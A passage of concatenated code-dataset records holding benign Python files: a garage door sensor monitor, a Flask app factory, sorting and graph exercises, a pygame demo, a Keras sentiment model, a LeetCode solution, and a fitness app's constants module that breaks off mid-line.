sleep\".format(iteration))\n\n\n#\n# This is the main processing where the command line arguments are\n# parsed and the monitoring function is called.\n#\n\ndef main():\n\n program_name = os.path.basename(__file__)\n door_log = journal.Journal(GDOOR_ACTIVITY_LOGGER,\n GDOOR_ACTIVITY_LOG_FILE,\n program_name)\n\n startup_log = journal.Journal(GDOOR_STARTUP_LOGGER,\n GDOOR_STARTUP_LOG_FILE,\n program_name)\n\n startup_log.information(\"Garage door monitor started.\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--checkstatus\",\n type=float,\n default=1.0,\n help=\"delay in minutes between checking door status\",\n )\n parser.add_argument(\"-i\",\n \"--individual\",\n type=float,\n default=0.5,\n help=\"delay in seconds between taking individual measurements\",\n )\n parser.add_argument(\"-m\",\n \"--measurements\",\n type=int,\n default=3,\n help=\"number of measurements for averaging\",\n )\n parser.add_argument(\"-o\",\n \"--open\",\n type=int,\n default=50,\n help=\"number of cm above the door is considered open\",\n )\n parser.add_argument(\"-w\",\n \"--warning\",\n type=int,\n default=30,\n help=\"display warnings when the door is open more than this many minutes\",\n )\n parser.add_argument(\"-d\",\n \"--debug\",\n action='store_true',\n help=\"print and log debugging messages\",\n )\n\n args = parser.parse_args()\n\n msg = \"Each average will use {} measurements.\".format(args.measurements)\n door_log.information(msg)\n\n msg = \"There will be {} seconds delay between individual measurements.\".format(args.individual)\n door_log.information(msg)\n\n msg = \"There will be {} minutes ({} seconds) delay between checking the door's status.\".format(args.checkstatus, args.checkstatus*60)\n door_log.information(msg)\n\n msg = \"Door is considered open if sensor reading is less than {}\".format(args.open)\n door_log.information(msg)\n\n msg = \"Warnings will be sent every {} minutes while the door is open\".format(args.warning)\n door_log.information(msg)\n\n # Set whether debug messages are printed and logged based on \n # what was specified on the command.\n door_log.log_debug = args.debug\n\n # Convert the time between taking averaged measurements from\n # minutes to seconds.\n checkstatus = 60 * args.checkstatus\n\n monitor_door(GPIO_TRIGGER,\n GPIO_ECHO,\n GPIO_STATUS_LED,\n args.measurements,\n args.individual,\n checkstatus,\n args.open,\n args.warning,\n door_log,\n )\n\n door_log.debug(\"Exiting...\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"garage-monitor.py","file_name":"garage-monitor.py","file_ext":"py","file_size_in_byte":14153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"120491191","text":"import json\nfrom logging.config import dictConfig as loadLogginConfig\nfrom pydantic import ValidationError\nfrom email_validator import EmailNotValidError\nfrom flask import Flask\nfrom flask_cors import CORS\n#\nfrom social_network.errors import ApplicationError\nfrom social_network.database import Database\nfrom social_network.settings import Config\n\n\n__all__ = [\"create_application\"]\n\n\ndb = Database()\n\n\ndef create_application():\n app = Flask(\"social_network\")\n app.config.from_object(Config)\n\n CORS(app)\n db.init_app(app)\n\n setup_logging(app)\n register_error_handlers(app)\n register_blueprints(app)\n\n return app\n\n\ndef setup_logging(app):\n with open(app.config[\"LOGGING_SETTINGS\"], \"r\") as f:\n loadLogginConfig(json.load(f))\n\n\ndef register_blueprints(app):\n from social_network.blueprints import auth_blueprint\n from social_network.blueprints import posts_blueprint\n from social_network.blueprints import users_blueprint\n from social_network.blueprints import analytics_blueprint\n\n app.register_blueprint(auth_blueprint)\n app.register_blueprint(posts_blueprint)\n app.register_blueprint(users_blueprint)\n app.register_blueprint(analytics_blueprint)\n\n\ndef register_error_handlers(app):\n\n def _handle_error(error):\n reason_tmp = getattr(error, \"description\", \"Internal error\")\n code_tmp = getattr(error, \"code\", 500)\n details_tmp = getattr(error, \"details\", [])\n\n reason = reason_tmp if isinstance(reason_tmp, str) else \"Internal error\"\n code = int(code_tmp) if isinstance(code_tmp, int) else 500\n details = details_tmp if isinstance(details_tmp, (list, tuple)) else []\n\n return {\n \"status\": \"error\",\n \"reason\": reason,\n \"details\": details\n }, code\n\n def default_handler(error):\n app.logger.exception(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n\n\n def application_error_handler(error):\n app.logger.error(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n \n def validation_error_handler(error):\n app.logger.info(f\"Invalid input:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Incorrec input\",\n \"details\": error.errors()\n }, 400\n\n def unvalid_email_error_handler(error):\n app.logger.info(f\"Invalid Email:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Email is not valid\",\n \"details\": []\n }, 400\n \n app.register_error_handler(Exception, default_handler)\n app.register_error_handler(ValidationError, validation_error_handler)\n app.register_error_handler(ApplicationError, application_error_handler)\n app.register_error_handler(EmailNotValidError, unvalid_email_error_handler)\n","sub_path":"src/social_network/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"446459039","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 11:07:36 2018\n\n@author: ENFIUEMS02\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\n\n#CRIANDO UM GRAFO DO TIPO GRID 2D\n\nN = 2\n\nG=nx.grid_2d_graph(N,N) #4x4 grid\n\nfor i in range(N):\n for j in range(N):\n G.nodes[(i,j)]['position']=[i,j]\n\npos=nx.get_node_attributes(G,'position')\n\nnx.draw(G, pos, with_labels=True)\n#plt.gca().invert_xaxis\n#plt.gca().invert_yaxis\nplt.axis('on')\nplt.show()\n\nprint(nx.info(G))\n\nprint(\"Vértices:\")\n\nfor i in G.nodes():\n print(i, \"position= \", G.node(data='position')[i])\n","sub_path":"paper_netx_texture_v4.py","file_name":"paper_netx_texture_v4.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"620911124","text":"def insertionsort(a):\r\n for i in range(len(a)):\r\n temp = a[i]\r\n k = i\r\n while k > 0 and temp < a[k - 1]:\r\n a[k] = a[k - 1]\r\n k -= 1\r\n a[k] = temp\r\n\r\ndef bucketsort(a):\r\n b=[]\r\n n=len(a)\r\n for i in range(1,11):\r\n l=[]\r\n b.append(l)\r\n x=max(a)\r\n d=0.1\r\n\r\n while x>0:\r\n x=int(x/10)\r\n d=d*10\r\n \r\n for i in range(n):\r\n j=int(a[i]/d)\r\n print(j)\r\n b[j].append(a[i])\r\n\r\n for i in range(1,11):\r\n try:\r\n insertionsort(b[i])\r\n except:\r\n pass\r\n l=[] \r\n for i in b :\r\n for j in i :\r\n l.append(j)\r\n print(l)\r\n \r\ns = input(\"Enter the numbers\")\r\na=list(map(int, s.split()))\r\nbucketsort(a)\r\n","sub_path":"Sorting/bucketsort.py","file_name":"bucketsort.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"523444740","text":"nn = input().split()\nn = int(nn[0])\nl = int(nn[1])\nr = int(nn[2])\n#s = [n]\n'''\nwhile True:\n\tla = True\n\tfor i in range(len(s)):\n\n\t\tif s[i] > 1:\n\t\t\ts = s[:i]+[int(s[i]/2),s[i]%2, int(s[i]/2)]+s[i+1:]\n\t\t\tla = False\n\tif la:\n\t\tbreak\n\ndef f(w):\n\tif w == 1:\n\t\treturn [1]\n\tif w == 0:\n\t\treturn[0]\n\ta = f(int(w/2))\n\treturn a + [w%2] + a\n'''\nlis = []\nwhile n > 1:\n\tif n%2:\n\t\tlis.append(1)\n\telse:\n\t\tlis.append(0)\n\tn = int(n/2)\n\tprint(n)\nlis = lis[::-1]\nllis = len(lis)\ncount = 0\nprint(lis)\nprint(llis)\nfor i in range(l,r+1):\n\tif i % 2:\n\t\t#print(i)\n\t\tcount += 1\n\telse:\n\t\tfor j in range(llis):\n\t\t\tif i - 2**(j +1) <0:\n\t\t\t\t#print(i - 2**(j +1))\n\t\t\t\tbreak\n\t\t\tif (i-2**(j +1))%(2**(j+2)) == 0:\n\t\t\t\t#print(2**(j +1))\n\t\t\t\tcount += lis[j]\n\n\nprint(count)","sub_path":"Codeforces/399d2B.py","file_name":"399d2B.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"389514879","text":"\"\"\"\r\nDesafio089 - Crie um programa que leia nome e duas notas de varios alunos\r\ne guarde tudo em uma lista composta. No final mostre um boletim contendo a media\r\nde cada um e permita que o usuario possa mostrar as notas de cada aluno individualmente\r\n\"\"\"\r\nalunos = []\r\nwhile True:\r\n nome = input('Nome: ')\r\n n1 = float(input('Nota 1: '))\r\n n2 = float(input('Nota 2: '))\r\n media = (n1 + n2) / 2 \r\n alunos.append( [nome, [n1, n2], media] )\r\n sair = input('Deseja sair? [S/N] ')\r\n if sair in 'sS':\r\n break\r\n\r\nprint('-='*30)\r\n\r\nprint(f'{\"Nº \":<2}{\"NOME\":<10}{\"MÉDIA\":>8}')\r\nprint('-'*30)\r\n\r\nfor i,a in enumerate(alunos):\r\n\tprint('{:<4}{:<10}{:>8.1f}'.format(i,a[0],a[2]))\r\n\r\nprint('-'*30)\r\nwhile True:\r\n try:\r\n op = int(input('Mostrar notas de qual aluno acima?\\nDigite o número ou 999 para sair: '))\r\n if op == 999:\r\n print('Saindo...')\r\n break\r\n elif op <= len(alunos):\r\n print('-'*30)\r\n print('Notas de {} são {}'.format(alunos[op][0], alunos[op][1]))\r\n print('-'*30)\r\n except IndexError:\r\n print('Não há nenhum aluno com este número!')\r\n print('-'*30)","sub_path":"Desafio089.py","file_name":"Desafio089.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"488430098","text":"#!/usr/bin/python3.4\n\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\n\n#Ouverture de la fenêtre Pygame\nfenetre = pygame.display.set_mode((640, 480))\n\n#Chargement et collage du fond\nfond = pygame.image.load(\"background.jpg\").convert()\nfenetre.blit(fond, (0,0))\n\n#Chargement et collage du personnage\nperso = pygame.image.load(\"perso.png\").convert_alpha()\nposition_perso = perso.get_rect()\nfenetre.blit(perso, (200,300))\n\n#Rafraîchissement de l'écran\npygame.display.flip()\n\n#Variable qui continue la boucle si = 1, stoppe si = 0\ncontinuer = 1\n\n\npygame.key.set_repeat(400, 30)\n#Boucle infinie\nwhile continuer:\n for event in pygame.event.get(): #On parcours la liste de tous les événements reçus\n if event.type == QUIT: #Si un de ces événements est de type QUIT\n continuer = 0 #On arrête la boucle\n continuer = 0\n if event.type == KEYDOWN:\n if event.key == K_DOWN: #Si \"flèche bas\"\n #On descend le perso\n position_perso = position_perso.move(0,3)\n \n #Re-collage\n fenetre.blit(fond, (0,0)) \n fenetre.blit(perso, position_perso)\n #Rafraichissement\n pygame.display.flip()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"612369520","text":"import numpy as np\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import Embedding\nfrom keras.layers import LSTM\nfrom keras.layers import Conv1D, MaxPooling1D\nfrom keras_preprocessing.text import Tokenizer\n\nfrom datasets import sentiment_140\nfrom utils.data_utils import export\nfrom w2v import google_news_vectors_negative300\n\n# Embedding\nmaxlen = 100\nmax_features = 20000\n\n# Convolution\nkernel_size = 5\nfilters = 64\npool_size = 4\n\n# LSTM\nlstm_output_size = 70\n\n# Training\nbatch_size = 2048\nepochs = 7\n\nprint('Loading data...')\n(x_train, y_train), (x_val, y_val), (x_test, y_test) = sentiment_140.load_data()\n\nprint('Fitting tokenizer...')\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(np.concatenate((x_train, x_val, x_test)))\n\nprint('Convert text to sequences')\nx_train = tokenizer.texts_to_sequences(x_train)\nx_val = tokenizer.texts_to_sequences(x_val)\nx_test = tokenizer.texts_to_sequences(x_test)\n\nprint(len(x_train), 'train sequences')\nprint(len(x_val), 'validation sequences')\nprint(len(x_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\n\nx_train = sequence.pad_sequences(x_train, maxlen=maxlen)\nx_val = sequence.pad_sequences(x_val, maxlen=maxlen)\nx_test = sequence.pad_sequences(x_test, maxlen=maxlen)\n\nprint('x_train shape:', x_train.shape)\nprint('x_val shape:', x_val.shape)\nprint('x_test shape:', x_test.shape)\n\nprint('Loading w2v...')\nword2vec = google_news_vectors_negative300.load_w2v()\n\nprint('Preparing embedding matrix')\nword_index = tokenizer.word_index\nnb_words = len(word_index)+1\nprint(nb_words)\nembedding_matrix = np.zeros((nb_words, 300))\nfor word, i in word_index.items():\n if word in word2vec.vocab:\n embedding_matrix[i] = word2vec.word_vec(word)\nprint('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(embedding_matrix.shape[0],\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=False))\nmodel.add(Dropout(0.25))\nmodel.add(Conv1D(filters,\n kernel_size,\n padding='valid',\n activation='relu',\n strides=1))\nmodel.add(MaxPooling1D(pool_size=pool_size))\nmodel.add(LSTM(lstm_output_size))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nmodel.summary()\n\nprint('Train...')\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_val, y_val))\nscore, acc = model.evaluate(x_test, y_test, batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc)\n\nexport(model, history, tokenizer, name=\"sentiment_140_cnn_lstm\", score=score, acc=acc)\n","sub_path":"models/cnn_lstm/sentiment_140_cnn_lstm.py","file_name":"sentiment_140_cnn_lstm.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200062088","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\nbd_dictionary = {\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h'\n}\n\n\nused = set()\n\n\ndef get_pos(row, col):\n return bd_dictionary[row] + str(col)\n\n\ndef gen_Legal_Moves(x, y):\n newMoves = []\n moveOffsets = [(-1, 2), (1, 2), (2, 1), (2, -1), (1, -2),\n (-1, -2), (-2, -1), (-2, 1)]\n for i in moveOffsets:\n newX = x + i[0]\n newY = y + i[1]\n if legal_Coord(newX) and legal_Coord(newY):\n newMoves.append((newX, newY))\n return newMoves\n\n\ndef legal_Coord(x):\n if x >= 1 and x <= 8:\n return True\n else:\n return False\n\n\ndef create_Graph():\n horse_Graph = dict()\n for row in range(1, 9, 1):\n for col in range(1, 9, 1):\n node_Id = get_pos(row, col)\n new_Positions = gen_Legal_Moves(row, col)\n temp = []\n for e in new_Positions:\n n_id = get_pos(e[0], e[1])\n temp.append(n_id)\n horse_Graph.update({node_Id: temp})\n return horse_Graph\n\n\ndef DFS(graph, current, end, fr):\n used.add(current)\n previous[current] = fr\n for node in graph[current]:\n if node not in used:\n if node == end:\n previous[end] = current\n break\n DFS(graph, node, end, current)\n\nif __name__ == \"__main__\":\n global previous\n previous = dict()\n graph = create_Graph()\n with open('in.txt', 'r') as inp:\n data = inp.read().split('\\n')\n start = data[0]\n end = data[1]\n DFS(graph, start, end, start)\n res = []\n now = end\n while now != start:\n res.append(now)\n now = previous[now]\n res.append(start)\n res.reverse()\n with open('out.txt', 'w') as out:\n counter = 1\n for step in res:\n if counter != len(res):\n out.write(step + '\\n')\n counter += 1\n else:\n out.write(step)\n","sub_path":"1-й семестр/problem_two/main_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"638674379","text":"'''\n\n637. Average of Levels in Binary Tree\n\nGiven a non-empty binary tree, return the average value of the nodes on each level in the form of an array.\n\nExample 1:\n\nInput:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nOutput: [3, 14.5, 11]\n\nExplanation:\n\nThe average value of nodes on level 0 is 3, on level 1 is 14.5, and on level 2 is 11. \n\nHence return [3, 14.5, 11].\n\nNote:\n\nThe range of node's value is in the range of 32-bit signed integer.\n\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\nclass Solution(object):\n def averageOfLevels(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if root is None:\n return []\n queue = deque()\n result = []\n queue.append(root)\n while queue:\n size = len(queue)\n sum = 0.0\n for index in xrange(size):\n cur = queue.popleft()\n sum += cur.val\n if cur.left:\n queue.append(cur.left)\n if cur.right:\n queue.append(cur.right)\n result.append(sum / size)\n return result\n","sub_path":"637.AverageofLevelsinBinaryTree.py","file_name":"637.AverageofLevelsinBinaryTree.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"220581368","text":"# -*- coding: utf-8 -*-\n# \n# # MIT License\n# \n# Copyright (c) 2019 Mike Simms\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"Key strings for all key/value pairs used in the app\"\"\"\n\n# Keys associated with user management.\nSESSION_KEY = '_straen_username'\nDATABASE_ID_KEY = \"_id\"\nUSERNAME_KEY = \"username\" # Login name for a user\nPASSWORD_KEY = \"password\" # User's password\nPASSWORD1_KEY = \"password1\" # User's password when creating an account\nPASSWORD2_KEY = \"password2\" # User's confirmation password when creating an account\nDEVICE_KEY = \"device\" # Unique identifier for the device which is recording the activity\nDEVICES_KEY = \"devices\" # List of device identifiers\nREALNAME_KEY = \"realname\" # User's real name\nHASH_KEY = \"hash\" # Password hash\nFRIEND_REQUESTS_KEY = \"friend_requests\"\nFRIENDS_KEY = \"friends\"\nREQUESTING_USER_KEY = \"requesting_user\"\nPR_KEY = \"pr\" # Personal record\nEMAIL_KEY = \"email\" # User's email\nTARGET_EMAIL_KEY = \"target_email\" # Email address of another user\n\n# User settings\nDEFAULT_PRIVACY = \"default privacy\"\nPREFERRED_UNITS_KEY = \"preferred units\"\nUNITS_METRIC_KEY = \"metric\"\nUNITS_STANDARD_KEY = \"standard\"\nBIRTHDAY_KEY = \"birthday\"\nDEFAULT_BIRTHDAY = \"315532800\"\nHEIGHT_KEY = \"height\"\nDEFAULT_HEIGHT = \"1.8\"\nWEIGHT_KEY = \"weight\" # User's weight (kilograms)\nDEFAULT_WEIGHT = \"70\"\nGENDER_KEY = \"gender\"\nGENDER_MALE_KEY = \"male\"\nGENDER_FEMALE_KEY = \"female\"\nRESTING_HEART_RATE_KEY = \"resting heart rate\"\nESTIMATED_MAX_HEART_RATE_KEY = \"estimated max heart rate\"\nESTIMATED_FTP_KEY = \"estimated ftp\"\nPREFERRED_LONG_RUN_DAY_KEY = \"preferred long run day\" # Day of the week on which the user prefers to do their long runs\nGOAL_TYPE_KEY = \"goal type\" # Extra info about the user's goal, such as whether they care about speed or just finishing a race\nGOAL_TYPE_COMPLETION = \"Completion\"\nGOAL_TYPE_SPEED = \"Speed\"\n\n# Personal records\nRECORDS_USER_ID = \"user_id\"\nRECORD_NAME = \"record_name\"\nPERSONAL_RECORDS = \"records\"\n\n# Workout plans\nWORKOUT_PLAN_USER_ID_KEY = \"user_id\"\nWORKOUT_PLAN_CALENDAR_ID_KEY = \"calendar id\"\nWORKOUT_LIST_KEY = \"workouts\"\nWORKOUT_ID_KEY = \"workout_id\"\nWORKOUT_TYPE_KEY = \"type\"\nWORKOUT_DESCRIPTION_KEY = \"description\"\nWORKOUT_SPORT_TYPE_KEY = \"sport type\"\nWORKOUT_WARMUP_KEY = \"warmup\"\nWORKOUT_INTERVALS_KEY = \"intervals\"\nWORKOUT_COOLDOWN_KEY = \"cooldown\"\nWORKOUT_SCHEDULED_TIME_KEY = \"scheduled time\"\n\n# Workout types\nWORKOUT_TYPE_REST = \"Rest\"\nWORKOUT_TYPE_EVENT = \"Event\"\nWORKOUT_TYPE_SPEED_RUN = \"Speed Run\"\nWORKOUT_TYPE_INTERVAL_SESSION = \"Interval Session\"\nWORKOUT_TYPE_TEMPO_RUN = \"Tempo Run\"\nWORKOUT_TYPE_EASY_RUN = \"Easy Run\"\nWORKOUT_TYPE_HILL_REPEATS = \"Hill Repeats\" # 4-10 repeats, depending on skill level, done at 5K pace\nWORKOUT_TYPE_MIDDLE_DISTANCE_RUN = \"Middle Distance Run\" # 2 hour run for advanced distance runners\nWORKOUT_TYPE_LONG_RUN = \"Long Run\"\nWORKOUT_TYPE_OPEN_WATER_SWIM = \"Open Water Swim\"\nWORKOUT_TYPE_POOL_WATER_SWIM = \"Pool Swim\"\n\n# Keys associated with uploading data\nUPLOADED_FILE_NAME_KEY = \"uploaded_file_name\"\nUPLOADED_FILE_DATA_KEY = \"uploaded_file_data\"\n\n# Keys inherited from the mobile app. Some of these are also used by the web app.\nAPP_NAME_KEY = \"Name\"\nAPP_TIME_KEY = \"Time\"\nAPP_USERNAME_KEY = \"User Name\"\nAPP_DEVICE_ID_KEY = \"DeviceId\"\nAPP_ID_KEY = \"ActivityId\"\nAPP_TYPE_KEY = \"ActivityType\"\nAPP_DISTANCE_KEY = \"Distance\"\nAPP_DURATION_KEY = \"Duration\"\nAPP_CADENCE_KEY = \"Cadence\" # Raw cadence list.\nAPP_TEMP_KEY = \"Temperature\"\nAPP_CURRENT_SPEED_KEY = \"Current Speed\"\nAPP_AVG_SPEED_KEY = \"Avgerage Speed\"\nAPP_MOVING_SPEED_KEY = \"Moving Speed\" \nAPP_SPEED_VARIANCE_KEY = \"Speed Variance\"\nAPP_HEART_RATE_KEY = \"Heart Rate\" # Raw heart rate list.\nAPP_AVG_HEART_RATE_KEY = \"Average Heart Rate\" # Computed average heart rate.\nAPP_CURRENT_PACE_KEY = \"Current Pace\" # Computed pace list.\nAPP_POWER_KEY = \"Power\" # Raw power data list.\nAPP_SETS_KEY = \"Sets\"\nAPP_DISTANCES_KEY = \"distances\" # Distance between data points.\nAPP_LOCATIONS_KEY = \"locations\" # Raw position data.\nAPP_LOCATION_LAT_KEY = \"Latitude\"\nAPP_LOCATION_LON_KEY = \"Longitude\"\nAPP_LOCATION_ALT_KEY = \"Altitude\"\nAPP_ACCELEROMETER_KEY = \"accelerometer\" # Raw accelerometer list.\nAPP_AXIS_NAME_X = \"x\"\nAPP_AXIS_NAME_Y = \"y\"\nAPP_AXIS_NAME_Z = \"z\"\n\nLOCATION_LAT_KEY = \"latitude\"\nLOCATION_LON_KEY = \"longitude\"\nLOCATION_ALT_KEY = \"altitude\"\nLOCATION_TIME_KEY = \"time\"\n\nACCELEROMETER_AXIS_NAME_X = \"x\"\nACCELEROMETER_AXIS_NAME_Y = \"y\"\nACCELEROMETER_AXIS_NAME_Z = \"z\"\nACCELEROMETER_TIME_KEY = \"time\"\n\n# Keys used exclusively by the web app.\nACTIVITY_ID_KEY = \"activity_id\" # Unique identifier for the activity\nACTIVITY_HASH_KEY = \"activity_hash\"\nACTIVITY_TYPE_KEY = \"activity_type\"\nACTIVITY_DESCRIPTION_KEY = \"description\"\nACTIVITY_USER_ID_KEY = \"user_id\"\nACTIVITY_DEVICE_STR_KEY = \"device_str\"\nACTIVITY_LOCATIONS_KEY = \"locations\"\nACTIVITY_NAME_KEY = \"name\"\nACTIVITY_TIME_KEY = \"time\"\nACTIVITY_END_TIME_KEY = \"end_time\"\nACTIVITY_VISIBILITY_KEY = \"visibility\"\nACTIVITY_VISIBILITY_PUBLIC = \"public\"\nACTIVITY_VISIBILITY_PRIVATE = \"private\"\nACTIVITY_COMMENT_KEY = \"comment\"\nACTIVITY_COMMENTS_KEY = \"comments\"\nACTIVITY_COMMENTER_ID_KEY = \"commenter_id\" # User ID of the user leaving the comment on an activity\nACTIVITY_TAG_KEY = \"tag\"\nACTIVITY_TAGS_KEY = \"tags\"\nACTIVITY_SUMMARY_KEY = \"summary_data\"\nACTIVITY_EXPORT_FORMAT_KEY = \"export_format\"\nACTIVITY_NUM_POINTS = \"num_points\" \nACTIVITY_LOCATION_DESCRIPTION_KEY = \"location_description\" # Political description of the activity location (i.e., Florida)\nACTIVITY_INTERVALS = \"intervals\" # Intervals that were computed from the workout\n\n# Keys used to summarize activity data.\nBEST_SPEED = \"Best Speed\"\nBEST_PACE = \"Best Pace\"\nBEST_1K = \"Best 1K\"\nBEST_MILE = \"Best Mile\"\nBEST_5K = \"Best 5K\"\nBEST_10K = \"Best 10K\"\nBEST_15K = \"Best 15K\"\nBEST_HALF_MARATHON = \"Best Half Marathon\"\nBEST_MARATHON = \"Best Marathon\"\nBEST_METRIC_CENTURY = \"Best Metric Century\"\nBEST_CENTURY = \"Best Century\"\nBEST_5_SEC_POWER = \"5 Second Power\"\nBEST_12_MIN_POWER = \"12 Minute Power\"\nBEST_20_MIN_POWER = \"20 Minute Power\"\nBEST_1_HOUR_POWER = \"1 Hour Power\"\nMAX_POWER = \"Maximum Power\"\nMAX_HEART_RATE = \"Maximum Heart Rate\"\nMAX_CADENCE = \"Maximum Cadence\"\nAVG_PACE = \"Average Pace\"\nAVG_POWER = \"Average Power\"\nAVG_HEART_RATE = \"Average Heart Rate\"\nAVG_CADENCE = \"Average Cadence\"\nNORMALIZED_POWER = \"Normalized Power\"\nTHRESHOLD_POWER = \"Threshold Power\"\nINTENSITY_FACTOR = \"Intensity Factor\"\nTSS = \"TSS\" # Training Stress Score\nRTSS = \"rTSS\" # Run Training Stress Score\nVARIABILITY_INDEX = \"Variability Index\"\nCLUSTER = \"Cluster\"\nTOTAL_DISTANCE = \"Total Distance\"\nLONGEST_DISTANCE = \"Longest Distance\"\nMILE_SPLITS = \"Mile Splits\"\nKM_SPLITS = \"KM Splits\"\n\n# API-only keys.\nSECONDS = \"seconds\"\nDEVICE_LAST_HEARD_FROM = \"last_heard_from\"\n\n# Running paces.\nLONG_RUN_PACE = \"Long Run Pace\"\nEASY_RUN_PACE = \"Easy Run Pace\"\nTEMPO_RUN_PACE = \"Tempo Run Pace\"\nSPEED_RUN_PACE = \"Speed Run Pace\"\n\n# Keys used to manage gear.\nGEAR_KEY = \"gear\"\nGEAR_ID_KEY = \"gear_id\"\nGEAR_TYPE_KEY = \"type\"\nGEAR_NAME_KEY = \"name\"\nGEAR_DESCRIPTION_KEY = \"description\"\nGEAR_ADD_TIME_KEY = \"add_time\"\nGEAR_RETIRE_TIME_KEY = \"retire_time\"\nGEAR_INITIAL_DISTANCE_KEY = \"initial_distance\"\nGEAR_TYPE_BIKE = \"bike\"\nGEAR_TYPE_SHOES = \"shoes\"\nGEAR_SERVICE_HISTORY = \"service_history\"\n\n# Service record keys.\nSERVICE_RECORD_ID_KEY = \"service_id\"\nSERVICE_RECORD_DATE_KEY = \"date\"\nSERVICE_RECORD_DESCRIPTION_KEY = \"description\"\n\n# Activity types\nTYPE_UNSPECIFIED_ACTIVITY = \"Unknown\"\nTYPE_RUNNING_KEY = \"Running\"\nTYPE_HIKING_KEY = \"Hiking\"\nTYPE_WALKING_KEY = \"Walking\"\nTYPE_CYCLING_KEY = \"Cycling\"\nTYPE_MOUNTAIN_BIKING_KEY = \"Mountain Biking\"\nTYPE_OPEN_WATER_SWIMMING_KEY = \"Open Water Swimming\"\nTYPE_POOL_SWIMMING_KEY = \"Pool Swimming\"\nTYPE_PULL_UP_KEY = \"Pull Up\"\nTYPE_PUSH_UP_KEY = \"Push Up\"\nFOOT_BASED_ACTIVITIES = [ TYPE_RUNNING_KEY, TYPE_HIKING_KEY, TYPE_WALKING_KEY ]\nBIKE_BASED_ACTIVITIES = [ TYPE_CYCLING_KEY, TYPE_MOUNTAIN_BIKING_KEY ]\nSWIMMING_ACTIVITIES = [ TYPE_OPEN_WATER_SWIMMING_KEY, TYPE_POOL_SWIMMING_KEY ]\n\n# Activity names\nUNNAMED_ACTIVITY_TITLE = \"Unnamed\"\n\n# Interval workouts\nINTERVAL_REPEAT_KEY = \"Repeat\"\nINTERVAL_DISTANCE_KEY = \"Distance\"\nINTERVAL_PACE_KEY = \"Pace\"\nINTERVAL_RECOVERY_DISTANCE_KEY = \"Recovery Distance\"\nINTERVAL_RECOVERY_PACE_KEY = \"Recovery Pace\"\n\n# Goals\nGOAL_KEY = 